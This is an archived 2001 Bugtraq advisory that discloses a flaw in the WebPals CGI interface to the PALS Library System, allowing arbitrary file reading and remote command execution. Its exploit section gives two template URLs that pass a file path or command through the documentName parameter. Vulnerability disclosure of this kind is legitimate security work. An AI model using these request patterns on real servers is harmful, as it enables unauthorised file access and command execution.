[19149] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

PALS Library System "show files" Vulnerability and remote command

daemon@ATHENA.MIT.EDU (UkR-XblP)
Mon Feb 12 17:22:00 2001

MIME-Version: 1.0
Content-Type: text/plain; charset="KOI8-R"
Content-Transfer-Encoding: 8bit
Message-ID:  <web-16665872@backend2.aha.ru>
Date:         Mon, 12 Feb 2001 17:17:46 +0300
Reply-To: UkR-XblP <cuctema@OK.RU>
From: UkR-XblP <cuctema@OK.RU>
To: BUGTRAQ@SECURITYFOCUS.COM

Name: PALS Library System "show files" Vulnerability and
remote command executiom.
Date: 02.02.2001
About: This script is derived from an idea originated at
St.Olaf College to provide a www interface to the PALS
Library System. This idea was then worked on at Georgia
State University. This version of WebPals has been written
using their original ideal.
Problem: Through this bug you can see any files and command
execution. Problem lies in "pine pipe bug"
Author: UkR-XblP
Exploit:
http://www.victim.com/cgi-bin/pals-cgi?palsAction=restart&documentName=url_to_file
http://www.victim.com/pals-cgi?palsAction=restart&documentName=url_to_command
Get your free e-mail address at http://www.zmail.ru


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[19149] in bugtraq

PALS Library System "show files" Vulnerability and remote command

daemon@ATHENA.MIT.EDU (UkR-XblP)Mon Feb 12 17:22:00 2001

daemon@ATHENA.MIT.EDU (UkR-XblP)
Mon Feb 12 17:22:00 2001